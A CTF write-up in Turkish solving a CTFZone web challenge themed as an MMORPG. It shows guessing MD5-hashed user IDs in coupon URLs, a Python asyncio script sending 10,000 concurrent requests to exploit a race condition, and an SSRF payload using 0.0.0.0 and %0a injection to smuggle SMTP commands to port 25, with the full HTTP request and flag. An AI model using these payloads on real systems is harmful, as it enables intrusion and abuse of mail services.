Here is a new generation mmorpg game, where you can beat your friends, just finished crowdfunding campaign and available on your PC starting today. It's a bit buggy, but you know...
I heard that developers of this game are really greedy.

http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/game/battle/competitors/

Verilen linke tikladigimizda assagidaki sayfa goruluyor.

Sunulan bedava kuponu almak uzere donate sayfasini gittik.

Verilen hediye kuponu girdikten sonra assagidaki resim ile karsilastik.

Resimin URL‘si şu şekilde;

http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/storage/img/coupon_aa2a77371374094fe9e0bc1de3f94ed9.png

__coupon_aa2a77371374094fe9e0bc1de3f94ed9__ urlin suffixi userid’in md5li hali oldugunu farkettik ve baska bir sayinin md5’ini alip denedik.

http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/storage/img/coupon_6a81681a7af700c6385d36577ebec359.png

Kuponlar ile level atlattik fakat level 30’un otesine kuponlar ile gecilmiyormus. Bir umit Race Condition vardir diye umit ettik ve denedik.

import asyncio
from aiohttp import ClientSession

async def fetch(url, session):
    async with session.get(url) as response:
        return await response.read()

async def run(n):
    sem = asyncio.Semaphore(n)
    async with ClientSession(cookies={"session": "eyJ1aWQiOjgyOX0.DjeKvA.qA-vNIHjDFSPyuDwArZyGMQD984"}) as session:
        await asyncio.gather(*(asyncio.ensure_future(fetch("http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one:80/donate/lvlup", session)) for _ in range(n)))

number = 10000
loop = asyncio.get_event_loop()

future = asyncio.ensure_future(run(number))
loop.run_until_complete(future)

Ve 30’uncu leveli geçtik

30’uncu leveli gectigimizden dolayı Avatar ekleme ozelligi aktif olmus oldu.

Upload fonksiyonunda bir sey yoktu. Belki SSRF‘tir. 127.0.0.1 ve localhost engelliydi bu yüzden SSRF olgundan emin olduk. Ama 0.0.0.0 adresi calisiyordu. Port taramaya basladik.

25‘ci port yani SMTP portu acikmis. Host‘u manipüle ederek SMTP‘yi kullanmayı denedik.

Host: [0.0.0.0
helo 1v3m
mail from:<[email protected]>
rcpt to:<root>
data
subject: give me flag

1v3m
.
]:25

Yeni satır ayıracı SMTP‘de delimiter olduğu için her satırın sonuna yeni satırın URL Encoded hali olan %0A‘yı ekledik ve son payloadımızın son hali

[0.0.0.0%0ahelo 1v3m%0amail from:<[email protected]>%0arcpt to:<root>%0adata%0asubject: give me flag%0a%0a1v3m%0a.%0a]:25

Request‘imizin son hali şöyle oldu:

POST /user/avatar HTTP/1.1
Host: web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one/user/avatar
Content-Type: multipart/form-data; boundary=---------------------------4693211868403427471435307016
Content-Length: 581
Cookie: session=eyJ1aWQiOjgyN30.DjaSgA.ylhJXkstamQ7GahYWvUypKpvDQc
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------4693211868403427471435307016
Content-Disposition: form-data; name="avatar"; filename=""
Content-Type: application/octet-stream


-----------------------------4693211868403427471435307016
Content-Disposition: form-data; name="url"

https://[0.0.0.0%0ahelo 1v3m%0amail from:<[email protected]>%0arcpt to:<root>%0adata%0asubject: give me flag%0a%0a1v3m%0a.%0a]:25
-----------------------------4693211868403427471435307016
Content-Disposition: form-data; name="action"

save
-----------------------------4693211868403427471435307016--

Flag mailimize geldi

ve flag

ctfzone{1640392aaf27597150c97e04a99a6f08}